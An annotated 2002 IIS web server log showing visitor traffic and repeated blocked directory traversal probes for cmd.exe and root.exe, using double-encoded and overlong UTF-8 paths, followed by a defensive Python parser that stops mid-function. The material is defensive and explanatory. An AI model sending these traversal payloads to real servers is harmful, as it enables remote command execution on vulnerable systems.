// An example of an IIS 5.0 log. [The // (commented) parts are not part of this log.]
// IIS logs are located @ C:\WINNT\system32\LogFiles\W3SVC
// Note the many "<Rejected-By-UrlScan>" GET requests. Seen below are many attempts at executing
// "cmd.exe", a not-so-blatant attempt at commandeering my server.
// The 404 error codes mean they did not succeed.
// Much to my dismay, sometimes much of my site traffic is in fact attacks or attempts thereof!
// As you can see, about 5 lines below: after the first # sign, we have the obvious name of the server,
// IIS 5.0; then the version number; then the date of the log itself.
// Next, we have the date/time of arrival of the web surfer, search engine, etc.; then the client's IP address.
// This is followed by the local private IP address of my IIS server; then the GET command issued
// by the browser to retrieve files;
// then a 200 code (which I highlighted in white) = a successful response from IIS; then the browser ID/agent, OS, cookie, referer, etc.
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-08-29 01:34:16
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent) cs(Cookie) cs(Referer)
2002-08-29 01:34:16 209.53.157.130 - 192.168.1.55 80 GET /bios.html - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+4.0) - http://www.google.ca/search?q=BIOS+meaning&ie=UTF-8&oe=UTF-8&hl=en&meta=
2002-08-29 01:34:16 209.53.157.130 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+4.0) - http://www.riguy.com/bios.html
// About 2 lines above is a reference to the Google search engine. This means the client was "referred"
// to my humble web site by Google. Google "bots" archived my page on BIOS. It appears he/she
// searched for "BIOS meaning" and got my (again, humble) BIOS meaning page.
// I color-coded the key words in red myself.
2002-08-29 02:15:33 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/root.exe 404 - - -
2002-08-29 02:15:35 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/MSADC/root.exe 404 - - -
2002-08-29 02:15:38 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/c/winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:43 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/d/winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:44 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:46 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:47 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:49 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:51 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:53 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:55 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:16:00 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:16:04 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:16:05 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35c../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:16:09 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:16:09 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%252f../winnt/system32/cmd.exe 404 - - -
2002-08-29 03:07:37 202.69.162.8 - 192.168.1.55 80 GET /bios.html - 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+95;+DigExt) - http://google.yahoo.com/bin/query?p=Meaning+of+Bios&hc=0&hs=0
2002-08-29 03:07:40 202.69.162.8 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+95;+DigExt) - http://www.riguy.com/bios.html
2002-08-29 03:51:22 203.97.2.243 - 192.168.1.55 80 GET /bios.html - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - http://www.google.co.nz/search?q=bios+meaning&ie=UTF-8&oe=UTF-8&hl=en&btnG=Google+Search&lr=
2002-08-29 03:51:22 203.97.2.243 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - http://www.riguy.com/bios.html
2002-08-29 03:52:34 203.97.2.243 - 192.168.1.55 80 GET /index.html - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - http://www.riguy.com/bios.html
2002-08-29 03:52:36 203.97.2.243 - 192.168.1.55 80 GET /pix/helpdskbanner.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - http://www.riguy.com/index.html
2002-08-29 03:52:36 203.97.2.243 - 192.168.1.55 80 GET /pix/MCP_c.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - http://www.riguy.com/index.html
2002-08-29 03:52:36 203.97.2.243 - 192.168.1.55 80 GET /pix/logo2.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - http://www.riguy.com/index.html
2002-08-29 10:09:31 66.196.73.22 - 192.168.1.55 80 GET /hp1.html - 200 Mozilla/5.0+(Slurp/cat;+slurp@inktomi.com;+http://www.inktomi.com/slurp.html) - -
2002-08-29 10:56:52 217.230.185.24 - 192.168.1.55 80 GET /w2K_steps.html - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.google.de/search?q=%22data1.msi%22+%2Bdownload+%2BOutlook&ie=UTF-8&oe=UTF-8&hl=de&meta=lr%3Dlang_de%7Clang_en
2002-08-29 10:56:54 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k2.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:56:54 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k_thingy.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:56:55 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k1.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:56:55 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k6.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:56:56 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k7.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:56:56 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k3.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:56:58 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k4.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:56:59 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k8.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:56:59 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k5.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:57:00 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k9.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:57:00 217.230.185.24 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:57:02 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k9_.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:57:14 217.230.185.24 - 192.168.1.55 80 GET /email.html - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:57:14 217.230.185.24 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 304 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/email.html
2002-08-29 10:57:14 217.230.185.24 - 192.168.1.55 80 GET /Templates/yellber.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/email.html
2002-08-29 10:57:40 217.230.185.24 - 192.168.1.55 80 GET /index.html - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - -
2002-08-29 10:57:40 217.230.185.24 - 192.168.1.55 80 GET /pix/helpdskbanner.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/
2002-08-29 10:57:40 217.230.185.24 - 192.168.1.55 80 GET /pix/logo2.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/
2002-08-29 10:57:40 217.230.185.24 - 192.168.1.55 80 GET /pix/MCP_c.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/
2002-08-29 13:04:41 196.2.153.7 - 192.168.1.55 80 GET /hpinstall.html - 200 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT) - http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%224000tn+drivers%22&spell=1
2002-08-29 13:04:51 196.2.153.7 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT) - http://www.riguy.com/hpinstall.html
2002-08-29 15:48:28 64.45.208.154 - 192.168.1.55 80 GET /tcp.html - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+Win+9x+4.90) - http://www.google.com/search?q=tcp/ip+not+binding+to+3com+adapter&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=50&sa=N
2002-08-29 15:48:28 64.45.208.154 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+Win+9x+4.90) - http://www.riguy.com/tcp.html
2002-08-29 16:50:08 66.196.65.11 - 192.168.1.55 80 GET /robots.txt - 404 Mozilla/5.0+(Slurp/si;+slurp@inktomi.com;+http://www.inktomi.com/slurp.html) - -
2002-08-29 17:18:03 12.233.30.110 - 192.168.1.55 80 GET /w2K_steps.html - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://google.yahoo.com/bin/query?p=data1.msi+download&b=21&hc=0&hs=0&xargs=0
2002-08-29 17:18:03 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k2.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:05 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k3.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:05 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k4.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:07 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k1.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:07 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k5.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:07 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k_thingy.gif - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:08 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k6.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:08 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k7.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:10 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k8.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:10 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k9.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:11 12.233.30.110 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:11 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k9_.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:25:20 206.41.207.8 - 192.168.1.55 80 GET /index.html - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+Q312461) - http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%222000+pro%22+%22nt+domain%22+%222000+server%22&btnG=Google+Search
2002-08-29 17:25:45 206.41.207.8 - 192.168.1.55 80 GET /pix/logo2.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+Q312461) - http://www.riguy.com/
2002-08-29 17:25:45 206.41.207.8 - 192.168.1.55 80 GET /pix/MCP_c.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+Q312461) - http://www.riguy.com/
2002-08-29 17:25:48 206.41.207.8 - 192.168.1.55 80 GET /pix/helpdskbanner.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+Q312461) - http://www.riguy.com/
2002-08-29 17:48:26 195.215.171.49 - 192.168.1.55 80 GET /virus.html - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) - http://search.msn.dk/results.asp?cfg=SMCINITIAL&RS=CHECKED&v=1&srch=5&FORM=AS5&q=EntireNetwork
2002-08-29 17:48:26 195.215.171.49 - 192.168.1.55 80 GET /pix/feather.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) - http://www.riguy.com/virus.html
2002-08-29 20:52:08 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/root.exe 404 - - -
2002-08-29 20:52:08 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/MSADC/root.exe 404 - - -
2002-08-29 20:52:08 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/c/winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:08 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/d/winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:08 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:08 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:10 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:10 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:10 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:10 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:10 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:10 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:10 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:10 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35c../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:11 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:11 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%252f../winnt/system32/cmd.exe 404 - - -
2002-08-29 21:13:12 24.147.129.77 - 192.168.1.55 80 GET /w2k_upgrade.html - 200 Mozilla/4.77+[en]+(Win98;+U) - http://www.google.com/search?q=w2000++w98+dual+boot&hl=en&lr=&ie=UTF-8&start=10&sa=N
2002-08-29 21:13:12 24.147.129.77 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 200 Mozilla/4.77+[en]+(Win98;+U) - http://www.riguy.com/w2k_upgrade.html
2002-08-29 22:40:54 66.196.72.73 - 192.168.1.55 80 GET /att_gns.html - 200 Mozilla/5.0+(Slurp/cat;+slurp@inktomi.com;+http://www.inktomi.com/slurp.html) - -
2002-08-29 22:43:17 66.77.73.63 - 192.168.1.55 80 GET /epo_clt.html - 200 FAST-WebCrawler/3.6+(atw-crawler+at+fast+dot+no;+http://fast.no/support/crawler.asp) - -
2002-08-29 22:43:42 66.77.73.63 - 192.168.1.55 80 GET /smb3.html - 200 FAST-WebCrawler/3.6+(atw-crawler+at+fast+dot+no;+http://fast.no/support/crawler.asp) - -
2002-08-29 22:45:36 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/root.exe 404 - - -
2002-08-29 22:45:36 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/MSADC/root.exe 404 - - -
2002-08-29 22:45:36 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/c/winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:36 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/d/winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:37 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:37 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:37 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:37 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:38 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:38 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:38 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:38 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:38 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:38 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35c../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:39 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:39 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%252f../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:49:24 68.46.5.178 - 192.168.1.55 80 GET /index.html - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0;+T312461) - http://www.google.com/custom?q=Troubleshoot+IIS+Windows+2000+Pro&hl=en&lr=&ie=UTF-8&cof=L:http://www.comcast.net/images/comcastlogo_search.gif;LH:48;LW:176;LC:%23003366;VLC:%23660000;ALC:%23660000;GALT:%23003366;GFNT:%23666666;GIMP:%23660000;AH:left;&start=10&sa=N
2002-08-29 22:49:36 68.46.5.178 - 192.168.1.55 80 GET /pix/helpdskbanner.gif - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0;+T312461) - http://www.riguy.com/
2002-08-29 22:49:36 68.46.5.178 - 192.168.1.55 80 GET /pix/logo2.gif - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0;+T312461) - http://www.riguy.com/
2002-08-29 22:49:36 68.46.5.178 - 192.168.1.55 80 GET /pix/MCP_c.gif - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0;+T312461) - http://www.riguy.com/
2002-08-29 22:50:31 68.46.5.178 - 192.168.1.55 80 GET /iis.html - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0;+T312461) - http://www.riguy.com/
2002-08-29 22:50:31 68.46.5.178 - 192.168.1.55 80 GET /pix/hr1.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0;+T312461) - http://www.riguy.com/iis.html
2002-08-29 23:32:12 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/root.exe 404 - - -
2002-08-29 23:32:12 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/MSADC/root.exe 404 - - -
2002-08-29 23:32:12 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/c/winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:12 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/d/winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:12 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:13 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:13 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:13 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:13 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:13 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:14 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:14 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:14 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:14 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35c../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:14 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:14 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%252f../winnt/system32/cmd.exe 404 - - -
<snip>
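
// Added example (not part of the original page or its log): a short Python script that reads a log in this
// format using its #Fields line, picks out the <Rejected-By-UrlScan> entries and groups them by client IP,
// noting which requests hid the "../" behind double percent-encoding or overlong UTF-8 bytes.
// The sample lines are copied from the log above; the function names are made up for this example.

```python
import re
from collections import defaultdict

# Constructed sample: the #Fields header and a few lines copied from the log above.
SAMPLE = """\
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent) cs(Cookie) cs(Referer)
2002-08-29 01:34:16 209.53.157.130 - 192.168.1.55 80 GET /bios.html - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+4.0) - http://www.google.ca/search?q=BIOS+meaning&ie=UTF-8&oe=UTF-8&hl=en&meta=
2002-08-29 02:15:33 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/root.exe 404 - - -
2002-08-29 02:15:44 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:55 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:16:04 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 16:50:08 66.196.65.11 - 192.168.1.55 80 GET /robots.txt - 404 Mozilla/5.0+(Slurp/si;+slurp@inktomi.com;+http://www.inktomi.com/slurp.html) - -
2002-08-29 20:52:08 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/c/winnt/system32/cmd.exe 404 - - -
"""

REJECTED = "/<Rejected-By-UrlScan>"         # cs-uri-stem logged for a request UrlScan blocked
PCT = re.compile(r"%([0-9A-Fa-f]{2})")      # one percent-encoded byte
OVERLONG = re.compile(r"%c[01]%", re.I)     # bytes 0xC0/0xC1 never occur in valid UTF-8


def parse_w3c(text):
    """Yield one dict per entry, keyed by the names in the most recent #Fields line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split(" ")
            if len(values) == len(fields):  # skip truncated or merged lines
                yield dict(zip(fields, values))


def decode_passes(url):
    """Percent-decode until nothing changes; return (final text, passes that changed it)."""
    passes = 0
    while True:
        decoded = PCT.sub(lambda m: chr(int(m.group(1), 16)), url)
        if decoded == url:
            return url, passes
        url, passes = decoded, passes + 1


def summarize(text):
    """Group UrlScan rejections by client IP with the encodings and target files seen."""
    report = defaultdict(lambda: {"hits": 0, "techniques": set(), "targets": set()})
    for e in parse_w3c(text):
        if e["cs-uri-stem"] != REJECTED:
            continue                         # ordinary traffic, including plain 404s
        raw = e["cs-uri-query"].lstrip("~")  # in the lines above, the requested URL follows "~"
        decoded, passes = decode_passes(raw)
        row = report[e["c-ip"]]
        row["hits"] += 1
        row["targets"].add(decoded.replace("\\", "/").rsplit("/", 1)[-1].lower())
        if passes >= 2:                      # a second decode still changed the URL
            row["techniques"].add("double-encoding")
        if OVERLONG.search(raw):
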